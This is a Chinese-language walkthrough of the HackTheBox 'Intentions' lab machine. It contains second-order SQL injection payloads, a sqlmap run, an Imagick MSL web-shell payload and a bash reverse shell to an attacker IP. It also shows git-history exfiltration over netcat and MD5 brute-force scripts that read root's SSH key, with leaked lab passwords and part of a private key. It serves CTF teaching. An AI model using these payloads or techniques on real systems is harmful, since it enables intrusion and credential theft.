HTB Intentions writeup(SQL二次注入也是注入)
HTB Intentions writeup
- 大佬请忽略!
- 信息收集
- nmap
- http 80
- gobuster
- Shell as www-data
- Manual sql injection
- Sqlmap sql injection
- SSRF
- Arbitrary Object Instantiation
- VID Scheme RCE
- Fire
- Shell as greg
- Shell as root
大佬请忽略!
Intentions攻击要点:
一:SQL二次注入
二:RCE via ImageMagick
三:php任意对象实例化
四、.git泄露密码
五:Python脚本MD5破解
信息收集
nmap
nmap -p- --min-rate 1000 10.10.11.220
nmap -p- --min-rate 1000 10.10.11.220
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-18 09:03 CST
Nmap scan report for 10.10.11.220
Host is up (0.39s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open httpNmap done: 1 IP address (1 host up) scanned in 73.23 seconds
nmap -p22,80 -sC -sV --min-rate 1000 10.10.11.220
nmap -p22,80 -sC -sV --min-rate 1000 10.10.11.220
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-18 09:03 CST
Nmap scan report for 10.10.11.220
Host is up (0.18s latency).PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 47:d2:00:66:27:5e:e6:9c:80:89:03:b5:8f:9e:60:e5 (ECDSA)
|_ 256 c8:d0:ac:8d:29:9b:87:40:5f:1b:b0:a4:1d:53:8f:f1 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Intentions
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel靶机开放ssh22端口和nginx80端口。
http 80
http://10.10.11.220/
登录功能尝试弱口令和SQL注入都不成功。使用注册功能注册一个测试账号查看系统的功能。
gobuster
爆破目录
gobuster dir -u http://10.10.11.220/ -t 100 -o gobuster.log --no-error -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
─$ gobuster dir -u http://10.10.11.220/ -t 100 -o gobuster.log --no-error -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.11.220/
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/js (Status: 301) [Size: 178] [--> http://10.10.11.220/js/]
/css (Status: 301) [Size: 178] [--> http://10.10.11.220/css/]
/admin (Status: 302) [Size: 322] [--> http://10.10.11.220]
/logout (Status: 302) [Size: 322] [--> http://10.10.11.220]
/gallery (Status: 302) [Size: 322] [--> http://10.10.11.220]
/fonts (Status: 301) [Size: 178] [--> http://10.10.11.220/fonts/]
/storage (Status: 301) [Size: 178] [--> http://10.10.11.220/storage/]
Progress: 29999 / 30000 (100.00%)
===============================================================
Finished
===============================================================
admin、gallery、logout重定向到主页,storage拒绝访问。爆破js文件。
gobuster dir -u http://10.10.11.220/js -t 100 -o gobuster.log --no-error -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -x js
gobuster dir -u http://10.10.11.220/js -t 100 -o gobuster.log --no-error -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -x js
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.11.220/js
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: js
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/admin.js (Status: 200) [Size: 311246]
/login.js (Status: 200) [Size: 279176]
/gallery.js (Status: 200) [Size: 310841]
/app.js (Status: 200) [Size: 433792]
/mdb.js (Status: 200) [Size: 153684]
Progress: 59998 / 60000 (100.00%)
===============================================================
Finished
===============================================================
内容大意:
1、完善图片的添加方式,只允许批准的图片添加到画廊;
2、管理端服务部分功能升级到v2版本,密码采用客户端加密的方式传输,不再使用明文的方式传输密码;
3、升级还包括图像处理功能,目前这部分功能还在测试。
admin.js部分v2接口
Shell as www-data
SQL二次注入
SQL二次注入是一种数据库安全漏洞,攻击者在第一次输入的数据被存储到数据库后,在后续处理时未正确过滤或转义,导致注入的恶意SQL代码被执行。
Manual sql injection
测试输入框是否存在sql注入。使用如下语句页面功能没有报错,说明存在SQL注入。
food')/**/or/**/1=1#
检查所有功能都正常,没有明显错误。修改测试语句如下再次,查看系统是否出现异常。
food')/**/and/**/2=1#
Your Feed模块无法正常显示,说明此处可能存在二次注入点。
通过order by判断查询字段的个数,通过列表返回的字段猜测可能是6个或5个。
food')/**/order/**/by/**/6#
尝试5个字段。
寻找回显点。
')/**/union/**/select/**/1,2,3,4,5#
查看数据库版本version():10.6.12-MariaDB-0ubuntu0.22.04.1
获取数据库中的表:gallery_images,personal_access_tokens,migrations,users
')/**/union/**/select/**/1,2,(SELECT/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()),4,5#
获取users表结构:id,name,email,password,created_at,updated_at,admin,genres
获取表中敏感信息的数据
')/**/union/**/select/**/1,2,group_concat(name,':',email,':',password,':',admin),4,5/**/from/**/users#
Sqlmap sql injection
sqlmap -r first.req --second-req second.req --level 5 --batch --tamper space2comment --technique U -p genres --risk 3
└─$ sqlmap -r first.req --second-req second.req --level 5 --batch --tamper space2comment --technique U -p genres --risk 3_____H_____ ___["]_____ ___ ___ {1.9.6#stable}
|_ -| . [.] | .'| . |
|___|_ [,]_|_|_|__,| _||_|V... |_| https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 16:35:23 /2025-08-27/[16:35:23] [INFO] parsing HTTP request from 'first.req'
[16:35:23] [INFO] parsing second-order HTTP request from 'second.req'
[16:35:23] [INFO] loading tamper module 'space2comment'
JSON data found in POST body. Do you want to process it? [Y/n/q] Y
[16:35:23] [INFO] testing connection to the target URL
[16:35:24] [WARNING] heuristic (basic) test shows that (custom) POST parameter 'JSON genres' might not be injectable
[16:35:25] [INFO] testing for SQL injection on (custom) POST parameter 'JSON genres'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
[16:35:25] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[16:35:46] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'
[16:36:06] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[16:36:08] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[16:36:10] [INFO] target URL appears to have 5 columns in query
[16:36:12] [INFO] (custom) POST parameter 'JSON genres' is 'MySQL UNION query (NULL) - 1 to 10 columns' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
(custom) POST parameter 'JSON genres' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 85 HTTP(s) requests:
---
Parameter: JSON genres ((custom) POST)Type: UNION queryTitle: MySQL UNION query (NULL) - 5 columnsPayload: {"genres":"food') UNION ALL SELECT NULL,CONCAT(0x7176626b71,0x776f686c70497a7747774b4a4a724f6b53574a7679664c424e664159755452516a6356506b495545,0x7162627a71),NULL,NULL,NULL#"}
---
[16:36:12] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[16:36:12] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.18.0
back-end DBMS: MySQL (MariaDB fork)
[16:36:13] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 36 times
[16:36:13] [INFO] fetched data logged to text files under '/home/VexCjfkNgNW5/.local/share/sqlmap/output/10.10.11.220'[*] ending @ 16:36:13 /2025-08-27/
- -r genres.request: 使用 genres.request 文件中的 HTTP 请求作为注入点。
- –second-req feed.request: 指定第二个请求文件(feed.request),用于辅助测试(例如验证注入结果)。
- –batch: 自动选择默认选项,减少交互。
- –level 5: 测试所有可能的注入点和参数(最高级别,增加测试覆盖率)。
- –tamper=space2comment: 将 payload 中的空格替换为,用于绕过基于空格的过滤。
- –technique=U: 仅使用 UNION 注入技术,尝试通过 UNION SELECT 提取数据。
管理员账号使用v2接口登录
http://10.10.11.220/api/v2/auth/login 账号和加密密码:steve@intentions.htb $2y101010M/g27T1kJcOpYOfPqQlI3.YfdLIwr3EWbzWOLfpoTtjpeMqpp4twa
使用burp suite拦截登录请求,修改请求地址、变量名、用户名、密码。
访问admin页面
SSRF
**SSRF(服务器端请求伪造)**是一种攻击者通过诱导服务器发起恶意请求的漏洞,利用服务器的信任关系访问内部资源或外部服务
将base64转码可以看到被处理的图片。
各种尝试
Arbitrary Object Instantiation
Arbitrary Object Instantiation exploit
任意对象实例化(Arbitrary Object Instantiation, AOI)是一种 PHP 应用程序漏洞,发生在攻击者能够控制传递给 PHP 对象构造函数(如 new ClassName($user_input))的参数时,导致可以实例化任意类或执行意外行为。这种漏洞通常与不安全的用户输入处理或反序列化机制结合,可能引发严重的安全问题,如远程代码执行(RCE)、文件写入或信息泄露。
任意对象实例化漏洞:在LAM 5.5中,存在一个反序列化或对象注入漏洞,允许攻击者通过HTTP请求(如POST数据)强制PHP实例化任意内置类(如Imagick类)。Imagick类的构造函数可以接受图像路径参数,如果路径被操纵,就能触发ImageMagick的内部解析逻辑。
VID Scheme RCE
- 一种远程代码执行(RCE)利用方法,使用ImageMagick库的“VID Scheme”功能来实现攻击。这是一种巧妙的绕过方式,利用PHP的Imagick扩展(ImageMagick的PHP绑定)来注入和执行恶意PHP代码,而不需要外部连接或多步操作。
- VID Scheme:VID是ImageMagick中的一种“方案”(scheme),类似于URL方案(如http: 或 file:)。它由ImageMagick的ReadVIDImage函数处理,该函数会调用ExpandFilenames来扩展文件名。这意味着VID方案支持文件掩码(file mask),例如vid:msl:/tmp/php*,它可以匹配临时文件(如/tmp/phpXXXXXX),即使攻击者不知道确切文件名。这在PHP的临时文件处理中特别有用,因为PHP会生成随机命名的临时文件。
Final payload
核心思路:攻击者创建一个MSL(Magick Scripting Language,ImageMagick的脚本语言)文件,该文件嵌入PHP恶意代码。然后,使用VID方案让Imagick“读取”这个MSL文件,并通过ImageMagick的caption:和info:方案将代码写入服务器的可写Web目录(如/var/www/),从而创建一个Web Shell(后门脚本),允许后续远程执行任意命令。
Class Name: Imagick
Argument Value: vid:msl:/tmp/php*-- Request Data --
Content-Type: multipart/form-data; boundary=ABC
Content-Length: ...
Connection: close--ABC
Content-Disposition: form-data; name="swarm"; filename="swarm.msl"
Content-Type: text/plain<?xml version="1.0" encoding="UTF-8"?>
<image><read filename="caption:<?php @eval(@$_REQUEST['a']); ?>" /><!-- Relative paths such as info:./../../uploads/swarm.php can be used as well --><write filename="info:/var/www/swarm.php" />
</image>
--ABC--
使用caption:<?php @eval(@$_REQUEST['a']); ?>来嵌入PHP代码。这是一个简单的Web Shell,允许通过HTTP请求参数a执行任意PHP代码(例如,?a=system(‘id’); 来运行系统命令)。
使用info:/var/www/swarm.php来将注入的代码保存到指定路径(如swarm.php),使其成为可访问的Web文件。
完整的VID路径示例:vid:msl:/tmp/php*,它会自动匹配PHP生成的临时MSL文件。
攻击通过multipart/form-data HTTP请求上传MSL文件到临时目录。
然后,在Imagick构造函数中传入VID路径:new Imagick(‘vid:msl:/tmp/php*’),触发ImageMagick解析MSL,注入代码并写入Web目录。
整个过程只需一个请求,无需外部带外(out-of-band)连接,适用于安装了Imagick扩展的PHP环境。
Fire
Shell存储路径,其他路径没有写入权限。
构造payload,发起攻击
验证Shell
shell
反弹Shell:
bash -c 'bash -i >& /dev/tcp/10.10.16.10/9000 0>&1'
url编码:
%62%61%73%68%20%2d%63%20%27%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%31%30%2e%31%36%2e%31%30%2f%39%30%30%30%20%30%3e%26%31%27
升级全交互式Shell
script /dev/null -c bash
Ctr+c
stty raw -echo;fg
reset
screen
stty rows 20 columns 90(根据自己屏幕大小)
stty -a (查看屏幕参数)
Shell as greg
web服务端信息搜集
www-data@intentions:~/html/intentions$ ls -la
total 820
drwxr-xr-x 14 root root 4096 Feb 2 2023 .
drwxr-xr-x 3 root root 4096 Feb 2 2023 ..
-rw-r--r-- 1 root root 1068 Feb 2 2023 .env
drwxr-xr-x 8 root root 4096 Feb 3 2023 .git
-rw-r--r-- 1 root root 3958 Apr 12 2022 README.md
drwxr-xr-x 7 root root 4096 Apr 12 2022 app
-rwxr-xr-x 1 root root 1686 Apr 12 2022 artisan
drwxr-xr-x 3 root root 4096 Apr 12 2022 bootstrap
-rw-r--r-- 1 root root 1815 Jan 29 2023 composer.json
-rw-r--r-- 1 root root 300400 Jan 29 2023 composer.lock
drwxr-xr-x 2 root root 4096 Jan 29 2023 config
drwxr-xr-x 5 root root 4096 Apr 12 2022 database
-rw-r--r-- 1 root root 1629 Jan 29 2023 docker-compose.yml
drwxr-xr-x 534 root root 20480 Jan 30 2023 node_modules
-rw-r--r-- 1 root root 420902 Jan 30 2023 package-lock.json
-rw-r--r-- 1 root root 891 Jan 30 2023 package.json
-rw-r--r-- 1 root root 1139 Jan 29 2023 phpunit.xml
drwxr-xr-x 5 www-data www-data 4096 Feb 3 2023 public
drwxr-xr-x 7 root root 4096 Jan 29 2023 resources
drwxr-xr-x 2 root root 4096 Jun 19 2023 routes
-rw-r--r-- 1 root root 569 Apr 12 2022 server.php
drwxr-xr-x 5 www-data www-data 4096 Apr 12 2022 storage
drwxr-xr-x 4 root root 4096 Apr 12 2022 tests
drwxr-xr-x 45 root root 4096 Jan 29 2023 vendor
-rw-r--r-- 1 root root 722 Feb 2 2023 webpack.mix.js
.env 文件
web服务配置,获取数据库密码:02mDWOgsOga03G385!!3Plcx
www-data@intentions:~/html/intentions$ cat .env
APP_NAME=Intentions
APP_ENV=production
APP_KEY=base64:YDGHFO792XTVdInb9gGESbGCyRDsAIRCkKoIMwkyHHI=
APP_DEBUG=false
APP_URL=http://intentions.htb
LOG_CHANNEL=stack
LOG_DEPRECATIONS_CHANNEL=null
LOG_LEVEL=debug
DB_CONNECTION=mysql
DB_HOST=localhost
DB_PORT=3306
DB_DATABASE=intentions
DB_USERNAME=laravel
DB_PASSWORD=02mDWOgsOga03G385!!3Plcx
www-data@intentions:~/html/intentions$ grep sh$ /etc/passwd
root:x:0:0:root:/root:/bin/bash
steven:x:1000:1000:steven:/home/steven:/bin/bash
greg:x:1001:1001::/home/greg:/bin/sh
legal:x:1002:1002:,,,:/home/legal:/bin/bash
使用密码喷洒系统中的四个用户,没有成功。
.git信息泄露
通过查看代码提交记录获取用户greg的密码Gr3g1sTh3B3stDev3l0per!1998!。执行git报错,两种方式解决如下。
www-data@intentions:~/html/intentions$ git log
fatal: detected dubious ownership in repository at '/var/www/html/intentions'
To add an exception for this directory, call:git config --global --add safe.directory /var/www/html/intentions
www-data@intentions:~/html/intentions$ git config --global --add safe.directory /var/www/html/intentions
error: could not lock config file /var/www/.gitconfig: Permission denied
方式一:临时修改Git全局配置
/tmp git config --global --add safe.directory /var/www/html/intentions
HOME=/tmp git log -p
通过 HOME=/tmp git config --global --add safe.directory /var/www/html/intentions,你将 Git 的全局配置文件路径临时改为 /tmp/.gitconfig,绕过了 www-data 用户在默认家目录 /var/www 的权限限制,成功将 /var/www/html/intentions 标记为安全目录。随后,HOME=/tmp git log -p 使用相同的临时配置,允许 Git 绕过所有权检查,查看提交历史。
www-data@intentions:~/html/intentions$ HOME=/tmp git config --global --add safe.directory /var/www/html/intentions
www-data@intentions:~/html/intentions$ HOME=/tmp git log -p
WARNING: terminal is not fully functional
Press RETURN to continue
commit 1f29dfde45c21be67bb2452b46d091888ed049c3 (HEAD -> master)
Author: steve <steve@intentions.htb>
Date: Mon Jan 30 15:29:12 2023 +0100
...[snip].../*|--------------------------------------------------------------------------| Mix Asset Managementcommit f7c903a54cacc4b8f27e00dbf5b0eae4c16c3bb4
Author: greg <greg@intentions.htb>
Date: Thu Jan 26 09:21:52 2023 +0100
:Test cases did not work on steve's local database, switching to user factory per his advice
:
diff --git a/tests/Feature/Helper.php b/tests/Feature/Helper.php
index f57e37b..0586d51 100644
--- a/tests/Feature/Helper.php
+++ b/tests/Feature/Helper.php
@@ -8,12 +8,14 @@ class Helper extends TestCase{public static function getToken($test, $admin = false) {if($admin) {
- $res = $test->postJson('/api/v1/auth/login', ['email' => 'greg@intentions.htb', 'password' => 'Gr3g1sTh3B3stDev3
l0per!1998!']);
- return $res->headers->get('Authorization');
+ $user = User::factory()->admin()->create();}else {
- $res = $test->postJson('/api/v1/auth/login', ['email' => 'greg_user@intentions.htb', 'password' => 'Gr3g1sTh3B3s
tDev3l0per!1998!']);
- return $res->headers->get('Authorization');
+ $user = User::factory()->create();}
+
+ $token = Auth::login($user);
...[snip]...
方式二:打包下载到本地
www-data@intentions:~/html/intentions/.git$ tar -cf /tmp/site.tar .
www-data@intentions:/tmp$ cat site.tar | nc 10.10.16.10 9001
─$ nc -lvnp 9001 > site.tar
listening on [any] 9001 ...
connect to [10.10.16.10] from (UNKNOWN) [10.10.11.220] 36484
ssh shell
ssh greg@10.10.11.220
...[snip]...
$ echo $SHELL
/bin/sh
$ bash
greg@intentions:~$
greg@intentions:~$ ls -la
total 52
drwxr-x--- 4 greg greg 4096 Jun 19 2023 .
drwxr-xr-x 5 root root 4096 Jun 10 2023 ..
lrwxrwxrwx 1 root root 9 Jun 19 2023 .bash_history -> /dev/null
-rw-r--r-- 1 greg greg 220 Feb 2 2023 .bash_logout
-rw-r--r-- 1 greg greg 3771 Feb 2 2023 .bashrc
drwx------ 2 greg greg 4096 Jun 10 2023 .cache
-rwxr-x--- 1 root greg 75 Jun 10 2023 dmca_check.sh
-rwxr----- 1 root greg 11044 Jun 10 2023 dmca_hashes.test
drwxrwxr-x 3 greg greg 4096 Jun 10 2023 .local
-rw-r--r-- 1 greg greg 807 Feb 2 2023 .profile
-rw-r----- 1 root greg 33 Aug 28 01:47 user.txt
-rw-r--r-- 1 greg greg 39 Jun 14 2023 .vimrc
Shell as root
查看dmca_check.sh脚本信息,调用一个可执行文件/opt/scanner/scanner
greg@intentions:~$ cat dmca_check.sh
/opt/scanner/scanner -d /home/legal/uploads -h /home/greg/dmca_hashes.test
greg@intentions:~$ ls -la /opt/scanner/scanner
-rwxr-x--- 1 root scanner 1437696 Jun 19 2023 /opt/scanner/scanner
greg@intentions:~$ file /opt/scanner/scanner
/opt/scanner/scanner: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, Go BuildID=a7sTitVjvr1qc4Ngg3jt/LY6QPsAiDYUOHaK7gUXN/5aWVPmSwER6KHrDxGzr4/SUP48whD2UTLJ-Q2kLmf, stripped
greg@intentions:~$ stat /opt/scanner/scanner File: /opt/scanner/scannerSize: 1437696 Blocks: 2808 IO Block: 4096 regular file
Device: fd00h/64768d Inode: 131176 Links: 1
Access: (0750/-rwxr-x---) Uid: ( 0/ root) Gid: ( 1003/ scanner)
Access: 2025-08-28 02:43:57.731920365 +0000
Modify: 2023-06-19 11:18:15.684000000 +0000
Change: 2023-06-19 11:18:49.672000000 +0000Birth: 2023-06-19 11:18:14.700000000 +0000
getcap cap_dac_read_search权限
分析/opt/scanner/scanner这个文件的权限信息。
greg@intentions:~$ getcap /opt/scanner/scanner
/opt/scanner/scanner cap_dac_read_search=ep
- 全称:CAP_DAC_READ_SEARCH(Discretionary Access Control Read Search)。
- 作用:这个能力允许进程绕过文件读权限检查和目录读/执行权限检查。
- 读文件:即使文件没有读权限(例如,权限是 -wx------),具有此能力的进程也能读取文件内容。
- 目录操作:能绕过目录的读(r)和执行(x)权限检查,例如 ls 目录或 cd 进入目录,即使当前用户没有这些权限。
- DAC 是什么? DAC 是“Discretionary Access Control”(自主访问控制)的缩写,指 Linux 文件系统的传统权限模型(用户/组/其他人的 rwx 权限)。这个能力本质上是“豁免”这些检查,但不包括写权限(不能修改文件或创建新文件)。
- =ep
- Capabilities 可以设置在文件的三个集合中:Effective(有效集,e)、Permitted(许可集,p) 和 Inheritable(可继承集,i)。
- Effective (e):表示能力立即生效,进程执行时会直接获得这个特权。
- Permitted §:表示能力被允许,进程可以动态激活或禁用它(通过 capset() 系统调用)。
- Inheritable (i):表示能力可以继承给子进程(这里未设置)。
- =:覆盖之前的任何设置(如果有),精确设置这些能力。
Arbitrary File Read
/opt/scanner/scanner
greg@intentions:~$ /opt/scanner/scanner
The copyright_scanner application provides the capability to evaluate a single file or directory of files against a known blacklist and return matches.This utility has been developed to help identify copyrighted material that have previously been submitted on the platform.This tool can also be used to check for duplicate images to avoid having multiple of the same photos in the gallery.File matching are evaluated by comparing an MD5 hash of the file contents or a portion of the file contents against those submitted in the hash file.The hash blacklist file should be maintained as a single LABEL:MD5 per line.Please avoid using extra colons in the label as that is not currently supported.Expected output:1. Empty if no matches found2. A line for every match, example:[+] {LABEL} matches {FILE}-c stringPath to image file to check. Cannot be combined with -d-d stringPath to image directory to check. Cannot be combined with -c-h stringPath to colon separated hash file. Not compatible with -p-l intMaximum bytes of files being checked to hash. Files smaller than this value will be fully hashed. Smaller values are much faster but prone to false positives. (default 500)-p [Debug] Print calculated file hash. Only compatible with -c-s stringSpecific hash to check against. Not compatible with -h
读取/root/.ssh/id_rsa文件
python 脚本一:
#!/usr/bin/env python3
# 指定脚本使用 Python 3 解释器运行,允许在不同系统中灵活调用 Pythonimport hashlib
# 导入 hashlib 模块,用于计算 MD5 哈希值import subprocess
# 导入 subprocess 模块,用于执行外部命令(如调用 /opt/scanner/scanner)import sys
# 导入 sys 模块,用于处理命令行参数def get_hash(fn, n):# 定义 get_hash 函数,接受文件名 fn 和长度 n 作为参数"""Get the target hash for n length characters of filename fn"""# 函数文档字符串:说明函数用于获取文件 fn 前 n 个字符的哈希值proc = subprocess.run(f"/opt/scanner/scanner -c {fn} -s whatever -p -l {n}".split(),stdout=subprocess.PIPE, stderr=subprocess.PIPE)# 使用 subprocess.run 执行外部命令 /opt/scanner/scanner,参数包括:# -c 指定文件名 fn,-s 设置任意字符串(这里为 "whatever"),-p 和 -l n 指定长度# stdout 和 stderr 被捕获到管道中try:# 尝试解析命令输出return proc.stdout.decode().strip().split()[-1]# 将输出从字节解码为字符串,去除首尾空白,分割后取最后一个元素(假设为哈希值)except IndexError:# 如果输出格式不正确(例如,没有哈希值),捕获 IndexError 异常return None# 返回 None 表示无法获取哈希值def get_next_char(output, target):# 定义 get_next_char 函数,接受当前输出字节串 output 和目标哈希值 target"""Take the current output and figure out what thenext character will be given the target hash"""# 函数文档字符串:说明函数用于根据当前输出和目标哈希推断下一个字符for i in range(256):# 遍历 0 到 255(ASCII 字符的范围)if target == hashlib.md5(output + chr(i).encode()).hexdigest():# 检查当前输出加上字符 i 的 MD5 哈希是否等于目标哈希return chr(i).encode()# 如果匹配,返回该字符的字节形式output = b""
# 初始化 output 为空字节串,用于存储逐步推断出的字符序列fn = sys.argv[1]
# 从命令行参数获取文件名(sys.argv[1] 是第一个参数)while True:# 进入无限循环,逐步推断每个字符target = get_hash(fn, len(output) + 1)# 调用 get_hash 获取文件 fn 前 len(output) + 1 个字符的哈希值next_char = get_next_char(output, target)# 调用 get_next_char 推断下一个字符,基于当前 output 和目标哈希if next_char is None:# 如果 next_char 为 None(无法找到匹配字符),退出循环breakoutput += next_char# 将推断出的字符追加到 output 字节串print(next_char.decode(), end="")# 将字符解码为字符串并打印(不换行,使用 end="")
Python 脚本二
import string
# 导入 string 模块,提供可打印字符集(如字母、数字、符号等)import hashlib
# 导入 hashlib 模块,用于计算 MD5 哈希值import subprocess
# 导入 subprocess 模块,用于执行外部命令(如调用 /opt/scanner/scanner)base = ""
# 初始化 base 为空字符串,用于存储逐步推断出的字符序列hasResult = True
# 初始化 hasResult 为 True,控制主循环是否继续hashMap = {}
# 初始化 hashMap 为空字典,用于存储 MD5 哈希值到字符序列的映射readFile = "/root/.ssh/id_rsa"
# 定义目标文件路径为 root 用户的 SSH 私钥文件 /root/.ssh/id_rsadef checkMatch():# 定义 checkMatch 函数,用于检查 scanner 程序输出是否包含匹配的哈希值global base# 声明 base 为全局变量,以便在函数中修改global hashMap# 声明 hashMap 为全局变量,以便访问和更新哈希映射result = subprocess.Popen(["/opt/scanner/scanner", "-c", readFile, "-h", "./hash.log", "-l", str(len(base) + 1)], stdout=subprocess.PIPE)# 使用 subprocess.Popen 执行 /opt/scanner/scanner 命令,参数包括:# -c 指定目标文件 readFile,-h 指定哈希日志文件 ./hash.log,-l 指定长度为 len(base) + 1# stdout 被捕获到管道以便读取for line in result.stdout:# 遍历 scanner 程序的输出行line = str(line)# 将输出行(字节类型)转换为字符串if "[+]" in line:# 检查行是否包含 "[+]",表示可能找到匹配的哈希check = line.split(" ")# 将行按空格分割为列表,提取字段if len(check) == 4:# 如果分割后的字段数为 4,假设包含有效哈希信息if check[1] in hashMap:# 检查字段 1(假设为哈希值)是否在 hashMap 中base = hashMap[check[1]]# 如果找到匹配,将对应的字符序列更新到 basereturn True# 返回 True 表示找到匹配,继续循环return False# 如果没有匹配的哈希,返回 False 表示停止循环def writeFile(base):# 定义 writeFile 函数,生成所有可能的下一个字符的 MD5 哈希并写入文件f = open("hash.log", "w")# 以写模式打开 hash.log 文件hashmap = {}# 初始化局部 hashmap 字典(注意:此变量未使用,应为全局 hashMap)for character in string.printable:# 遍历 string.printable 中的所有可打印字符check = base + character# 将当前 base 加上一个字符,生成新的字符串checkHash = hashlib.md5(check.encode())# 计算新字符串的 MD5 哈希值md5 = checkHash.hexdigest()# 将 MD5 哈希值转换为十六进制字符串hashMap[md5] = check# 将哈希值和对应字符串存入全局 hashMapf.write(md5 + ":" + md5)# 写入哈希值到 hash.log 文件(格式为 md5:md5,可能是错误,应为 md5:check)f.write("\n")# 写入换行符f.close()# 关闭 hash.log 文件while hasResult:# 进入主循环,只要 hasResult 为 True 就继续writeFile(base)# 调用 writeFile 函数,生成并保存当前 base 加上一个字符的所有可能哈希hasResult = checkMatch()# 调用 checkMatch 检查 scanner 输出是否匹配 hashMap 中的哈希print("Found")# 打印 "Found" 表示找到一个匹配的字符print(base)# 打印当前推断出的字符序列
print("Done")
# 循环结束后,打印 "Done" 表示完成
读取/root/.ssh/id_rsa
greg@intentions:~$ python3 exploit.py /root/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEA5yMuiPaWPr6P0GYiUi5EnqD8QOM9B7gm2lTHwlA7FMw95/wy8JW3
HqEMYrWSNpX2HqbvxnhOBCW/uwKMbFb4LPI+EzR6eHr5vG438EoeGmLFBvhge54WkTvQyd
vk6xqxjypi3PivKnI2Gm+BWzcMi6kHI+NLDUVn7aNthBIg9OyIVwp7LXl3cgUrWM4StvYZ
ZyGpITFR/1KjaCQjLDnshZO7OrM/PLWdyipq2yZtNoB57kvzbPRpXu7ANbM8wV3cyk/OZt
0LZdhfMuJsJsFLhZufADwPVRK1B0oMjcnljhUuVvYJtm8Ig/8fC9ZEcycF69E+nBAiDuUm
kDAhdj0ilD63EbLof4rQmBuYUQPy/KMUwGujCUBQKw3bXdOMs/jq6n8bK7ERcHIEx6uTdw
gE6WlJQhgAp6hT7CiINq34Z2CFd9t2x1o24+JOAQj9JCubRa1fOMFs8OqEBiGQHmOIjmUj
7x17Ygwfhs4O8AQDvjhizWop/7Njg7Xm7ouxzoXdAAAFiJKKGvOSihrzAAAAB3NzaC1yc2
EAAAGBAOcjLoj2lj6+j9BmIlIuRJ6g/EDjPQe4JtpUx8JQOxTMPef8MvCVtx6hDGK1kjaV
9h6m78Z4TgQlv7sCjGxW+CzyPhM0enh6+bxuN/BKHhpixQb4YHueFpE70Mnb5OsasY8qYt
z4rypyNhpvgVs3DIupByPjSw1FZ+2jbYQSIPTsiFcKey15d3IFK1jOErb2GWchqSExUf9S
o2gkIyw57IWTuzqzPzy1ncoqatsmbTaAee5L82z0aV7uwDWzPMFd3MpPzmbdC2XYXzLibC
bBS4WbnwA8D1UStQdKDI3J5Y4VLlb2CbZvCIP/HwvWRHMnBevRPpwQIg7lJpAwIXY9IpQ+
txGy6H+K0JgbmFED8vyjFMBrowlAUCsN213TjLP46up/GyuxEXByBMerk3cIBOlpSUIYAK
eoU+woiDat+GdghXfbdsdaNuPiTgEI/SQrm0WtXzjBbPDqhAYhkB5jiI5lI+8de2IMH4bO
DvAEA744Ys1qKf+zY4O15u6Lsc6F3QAAAAMBAAEAAAGABGD0S8gMhE97LUn3pC7RtUXPky
tRSuqx1VWHu9yyvdWS5g8iToOVLQ/RsP+hFga+jqNmRZBRlz6foWHIByTMcOeKH8/qjD4O
9wM8ho4U5pzD5q2nM3hR4G1g0Q4o8EyrzygQ27OCkZwi/idQhnz/8EsvtWRj/D8G6ME9lo
pHlKdz4fg/tj0UmcGgA4yF3YopSyM5XCv3xac+YFjwHKSgegHyNe3se9BlMJqfz+gfgTz3
8l9LrLiVoKS6JsCvEDe6HGSvyyG9eCg1mQ6J9EkaN2q0uKN35T5siVinK9FtvkNGbCEzFC
